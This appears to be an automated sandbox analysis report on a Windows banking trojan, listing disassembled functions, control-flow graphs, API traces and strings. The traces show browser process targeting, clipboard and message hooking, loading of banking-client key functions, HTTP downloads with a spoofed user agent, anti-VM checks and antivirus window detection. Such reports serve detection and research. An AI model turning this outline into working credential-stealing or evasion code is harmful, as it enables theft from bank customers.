                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcessUser$AdminCriticalCurrentFreeInitializeModuleMutexPathSection$BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                                • String ID: --no-sandbox$ --no-sandbox$9E938C06a$9E938F4Aa$9e93884aa$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                • API String ID: 1834009341-3154889140
                                                                                                                                                                                                                • Opcode ID: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                                • Instruction ID: 6cd75a8fa496be08719709b6edc995bb9f876f1e48dd8f08d25037a33eeef06f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60629131A81319B6F77097A48D4AFAEA7AC9F44B44F7045D8FB05B70C0DFB09A059BA4
                                                                                                                                                                                                                Function 02BC5720 Relevance: 114.1, APIs: 43, Strings: 22, Instructions: 302libraryloaderthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 293 2bc5720-2bc57a3 memset GetModuleFileNameA RtlAddVectoredExceptionHandler CreateMutexA CreateThread 294 2bc57c8-2bc57f3 InitializeCriticalSection call 2bc2570 LoadLibraryExA 293->294 295 2bc57a5-2bc57b9 GetHandleInformation 293->295 300 2bc57f5-2bc57ff GetProcAddress 294->300 301 2bc5811-2bc5820 LoadLibraryExA 294->301 295->294 297 2bc57bb-2bc57bf 295->297 297->294 299 2bc57c1-2bc57c2 CloseHandle 297->299 299->294 300->301 302 2bc5801-2bc580c call 2bca540 300->302 303 2bc5876-2bc588a InitializeCriticalSection GetModuleHandleA 301->303 304 2bc5822-2bc582c GetProcAddress 301->304 302->301 305 2bc588c-2bc5896 GetProcAddress 303->305 306 2bc58a8-2bc58c1 GetCurrentProcessId call 2bd4880 303->306 304->303 308 2bc582e-2bc5848 call 2bca540 GetProcAddress 304->308 305->306 309 2bc5898-2bc58a3 call 2bca540 305->309 315 2bc5902-2bc5913 LoadLibraryExA 306->315 316 2bc58c3-2bc58e3 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 306->316 308->303 317 2bc584a-2bc5864 call 2bca540 GetProcAddress 308->317 309->306 320 2bc5915-2bc591f GetProcAddress 315->320 321 2bc5931-2bc5937 GetCurrentProcessId call 2bd4880 315->321 316->315 318 2bc58e5-2bc58f9 lstrcmpiA 316->318 317->303 328 2bc5866-2bc5871 call 2bca540 317->328 318->315 323 2bc58fb-2bc5900 call 2bb8560 318->323 320->321 325 2bc5921-2bc592c call 2bca540 320->325 326 2bc593c-2bc593e 321->326 323->321 325->321 330 2bc597c-2bc5980 326->330 331 2bc5940-2bc5960 GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 326->331 328->303 335 2bc5986-2bc59a6 call 2bc9820 call 2bb1660 StrStrIA 330->335 336 2bc5ae7-2bc5aed 330->336 331->330 334 2bc5962-2bc5976 lstrcmpiA 331->334 334->330 334->336 341 2bc59be-2bc59ce StrStrIA 335->341 342 2bc59a8-2bc59b8 StrStrIA 335->342 341->336 343 2bc59d4-2bc59e7 LoadLibraryExA 341->343 342->336 342->341 344 2bc5a3d-2bc5a73 InitializeCriticalSection call 2bc1900 call 2bc1190 call 2bbff90 LoadLibraryExA 343->344 345 2bc59e9-2bc59f3 GetProcAddress 343->345 360 2bc5a75-2bc5a7f GetProcAddress 344->360 361 2bc5a91-2bc5a9e LoadLibraryExA 344->361 347 2bc5a05-2bc5a0f GetProcAddress 345->347 348 2bc59f5-2bc5a00 call 2bca540 345->348 349 2bc5a21-2bc5a2b GetProcAddress 347->349 350 2bc5a11-2bc5a1c call 2bca540 347->350 348->347 349->344 354 2bc5a2d-2bc5a38 call 2bca540 349->354 350->349 354->344 360->361 364 2bc5a81-2bc5a8c call 2bca540 360->364 362 2bc5abc-2bc5ac9 LoadLibraryExA 361->362 363 2bc5aa0-2bc5aaa GetProcAddress 361->363 362->336 366 2bc5acb-2bc5ad5 GetProcAddress 362->366 363->362 365 2bc5aac-2bc5ab7 call 2bca540 363->365 364->361 365->362 366->336 369 2bc5ad7-2bc5ae2 call 2bca540 366->369 369->336
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7556F550,75497390,75570A60), ref: 02BC5757
                                                                                                                                                                                                                • RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB38), ref: 02BC587B
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02BC5882
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02BC5892
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02BB79E0,02C09E88), ref: 02BC58A8
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC58C3
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC58D8
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC58DF
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC58F1
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC590B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02BC591B
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,02BBBB50,02BFEB74), ref: 02BC5931
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BC5940
                                                                                                                                                                                                                • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC5955
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(00000000), ref: 02BC595C
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BC596E
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,java), ref: 02BC59A2
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.exe), ref: 02BC59B4
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02BC59CA
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC59E1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02BC59EF
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02BC5A0B
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02BC5A27
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(02BFFB20), ref: 02BC5A42
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02BC5A6F
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02BC5A7B
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02BC5A9A
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02BC5AA6
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02BC5AC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02BC5AD1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                                • String ID: .exe$9e93884aa$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                                • API String ID: 1248150503-2087846181
                                                                                                                                                                                                                • Opcode ID: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                                • Instruction ID: cd75bd8cc58f70b4831ba677a114415b8e6b007dcbdd572cc1aacb573b61f952
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E91B171BC030576FA706AB55C8AFAA275C9F04F84FA044D8BB52F6091EBE4F5448B74
                                                                                                                                                                                                                Function 02BC4AB0 Relevance: 100.2, APIs: 48, Strings: 9, Instructions: 421memorynetworkfileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 371 2bc4ab0-2bc4afd memset 372 2bc4f75-2bc4f7d 371->372 373 2bc4b03-2bc4b06 371->373 373->372 374 2bc4b0c-2bc4b0f 373->374 375 2bc4b15-2bc4b1c 374->375 376 2bc4bb0-2bc4bcd InternetOpenA 374->376 379 2bc4b1e-2bc4b38 GetProcessHeap HeapAlloc 375->379 380 2bc4b49-2bc4b4e 375->380 377 2bc4f1a 376->377 378 2bc4bd3-2bc4bec InternetConnectA 376->378 382 2bc4f20-2bc4f25 377->382 378->377 381 2bc4bf2-2bc4bfc 378->381 383 2bc4b3a-2bc4b43 memset 379->383 384 2bc4b46 379->384 380->372 385 2bc4b54-2bc4b6f memcpy 380->385 386 2bc4bfe 381->386 387 2bc4c03-2bc4c24 HttpOpenRequestA 381->387 388 2bc4f27-2bc4f35 GetProcessHeap HeapValidate 382->388 389 2bc4f43-2bc4f4d 382->389 383->384 384->380 390 2bc4b70-2bc4b7e 385->390 386->387 387->377 392 2bc4c2a-2bc4c33 387->392 388->389 393 2bc4f37-2bc4f3d GetProcessHeap HeapFree 388->393 394 2bc4f4f-2bc4f53 InternetCloseHandle 389->394 395 2bc4f55-2bc4f5a 389->395 390->390 391 2bc4b80 390->391 396 2bc4b82-2bc4b93 391->396 397 2bc4c4e 392->397 398 2bc4c35-2bc4c39 392->398 393->389 394->395 399 2bc4f5c-2bc4f5d InternetCloseHandle 395->399 400 2bc4f5f-2bc4f64 395->400 403 2bc4b95 396->403 404 2bc4b97-2bc4b9e 396->404 406 2bc4c51-2bc4c64 HttpAddRequestHeadersA 397->406 398->397 405 2bc4c3b-2bc4c4c HttpAddRequestHeadersA 398->405 399->400 401 2bc4f69-2bc4f72 400->401 402 2bc4f66-2bc4f67 InternetCloseHandle 400->402 402->401 403->404 404->396 409 2bc4ba0-2bc4bab call 2bc8160 404->409 405->406 407 2bc4c96-2bc4c9b 406->407 408 2bc4c66-2bc4c94 _snprintf HttpAddRequestHeadersA 406->408 410 2bc4c9d 407->410 411 2bc4ca0-2bc4cb2 HttpSendRequestA 407->411 408->407 409->376 410->411 411->377 413 2bc4cb8-2bc4cd5 HttpQueryInfoA 411->413 413->377 414 2bc4cdb-2bc4ce2 413->414 414->377 415 2bc4ce8-2bc4d10 CreateFileA 414->415 415->377 416 2bc4d16-2bc4d1d call 2bd5930 415->416 419 2bc4d1f-2bc4d34 ConvertStringSecurityDescriptorToSecurityDescriptorW 416->419 420 2bc4d76-2bc4d90 GetProcessHeap RtlAllocateHeap 416->420 419->420 421 2bc4d36-2bc4d55 GetSecurityDescriptorSacl 419->421 422 2bc4e5a-2bc4e5c 420->422 423 2bc4d96-2bc4dc3 memset InternetReadFile 420->423 428 2bc4d6c-2bc4d70 LocalFree 421->428 429 2bc4d57-2bc4d66 SetNamedSecurityInfoA 421->429 426 2bc4e5e-2bc4e72 GetHandleInformation 422->426 427 2bc4e81-2bc4e95 call 2bb74a0 422->427 424 2bc4e3e-2bc4e4c GetProcessHeap HeapValidate 423->424 425 2bc4dc5-2bc4dca 423->425 424->422 431 2bc4e4e-2bc4e54 GetProcessHeap HeapFree 424->431 425->424 430 2bc4dcc-2bc4e23 SetFilePointer LockFile WriteFile UnlockFile GetProcessHeap HeapValidate 425->430 426->427 432 2bc4e74-2bc4e78 426->432 427->382 437 2bc4e9b-2bc4ea5 427->437 428->420 429->428 430->420 434 2bc4e29-2bc4e39 GetProcessHeap RtlFreeHeap 430->434 431->422 432->427 435 2bc4e7a-2bc4e7b CloseHandle 432->435 434->420 435->427 438 2bc4eb0-2bc4ebe 437->438 438->438 439 2bc4ec0 438->439 440 2bc4ec2-2bc4ed3 439->440 441 2bc4ed5 440->441 442 2bc4ed7-2bc4ede 440->442 441->442 442->440 443 2bc4ee0-2bc4f0a call 2bc8160 call 2bb7350 GetProcessHeap HeapValidate 442->443 443->382 448 2bc4f0c-2bc4f18 GetProcessHeap RtlFreeHeap 443->448 448->382
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02BC4B5D
                                                                                                                                                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BC4D2C
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02BC4D4D
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC4D66
                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4D70
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02BC4D83
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4D86
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4D9E
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02BC4DBB
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02BC4DDC
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DEC
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DFB
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E0B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E14
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E1B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E2C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,?,?,?,?,00000000), ref: 02BC4E33
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E41
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E44
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E51
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E54
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02BC4E6A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02BC4E7B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • S:(ML;;NRNWNX;;;LW), xrefs: 02BC4D27
                                                                                                                                                                                                                • GET, xrefs: 02BC4BF5
                                                                                                                                                                                                                • Referer: http://www.google.com, xrefs: 02BC4C58
                                                                                                                                                                                                                • HTTP/1.0, xrefs: 02BC4C11
                                                                                                                                                                                                                • POST, xrefs: 02BC4BFE, 02BC4C17
                                                                                                                                                                                                                • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02BC4C6B
                                                                                                                                                                                                                • Content-Type: application/x-www-form-urlencoded, xrefs: 02BC4C42
                                                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02BC4BBD
                                                                                                                                                                                                                • 3d11e105700a76c9, xrefs: 02BC4C66
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                                • String ID: 3d11e105700a76c9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1986934500-133595173
                                                                                                                                                                                                                • Opcode ID: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                                • Instruction ID: 93a8a5890c099451beed93aa5bb10ce8666d4c7aed195e4dba8c807d2c5e8bcd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcb0f9743e80802f877bbcd23ef69d44cea1b355611397f996dda56557d589ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2ED1B171A40215ABEB609FA49C59FAF7B7CEF08754F204598FA05E7180DBB4DA10CBA4
                                                                                                                                                                                                                Function 00402D30 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157librarywindowCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 770 402d30-402d62 LoadLibraryA GetModuleFileNameA call 403a20 773 402d64-402d66 ExitProcess 770->773 774 402d6c-402d87 call 4021d0 call 4020e0 FindWindowA 770->774 779 402da1-402dbf call 402360 call 402450 call 402540 call 402680 IsUserAnAdmin 774->779 780 402d89-402d9b GetTickCount PostMessageA 774->780 789 402dc1-402dc8 call 401ea0 779->789 790 402de3-402dfb IsUserAnAdmin GetModuleHandleA 779->790 780->779 802 402dd2-402dd9 call 403560 789->802 803 402dca-402dcc ExitProcess 789->803 791 402e1c-402e20 790->791 792 402dfd-402e0d GetProcAddress 790->792 795 402e22-402e24 791->795 796 402e6e-402e70 791->796 792->791 794 402e0f-402e19 GetCurrentProcess 792->794 794->791 800 402e26-402e3a StrStrIA 795->800 801 402e3c-402e5a call 402930 GetCurrentProcessId call 401670 Sleep 795->801 798 402e76-402e8a StrStrIA 796->798 799 402efd-402f16 call 402930 GlobalFindAtomA 796->799 805 402ea1-402eb4 call 402a70 GlobalFindAtomA 798->805 806 402e8c-402e9c call 402930 call 4028d0 798->806 821 402f58-402f5a ExitProcess 799->821 822 402f18-402f27 GlobalAddAtomA IsUserAnAdmin 799->822 800->801 808 402e5f-402e69 call 402a70 call 4012b0 800->808 801->821 802->790 817 402ddb-402ddd ExitProcess 802->817 827 402ef6-402efb call 4012b0 805->827 828 402eb6-402ec5 GlobalAddAtomA IsUserAnAdmin 805->828 806->821 808->821 825 402f39-402f42 IsUserAnAdmin 822->825 826 402f29-402f31 822->826 831 402f44 825->831 832 402f49-402f51 call 4015a0 825->832 826->825 827->821 835 402ed7-402ee0 IsUserAnAdmin 828->835 836 402ec7-402ecf 828->836 831->832 832->821 844 402f53 call 401670 832->844 837 402ee2 835->837 838 402ee7-402eef call 4015a0 835->838 836->835 837->838 838->827 846 402ef1 call 401670 838->846 844->821 846->827
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                  • Part of subcall function 00403A20: RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                  • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                  • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                  • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                                • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                • String ID: IsWow64Process$PnEw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3353599405-2298154373
                                                                                                                                                                                                                • Opcode ID: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
                                                                                                                                                                                                                • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21102898d184598221165a6fef4bec34bd79f3d1470297f61f252bfca23f0e31
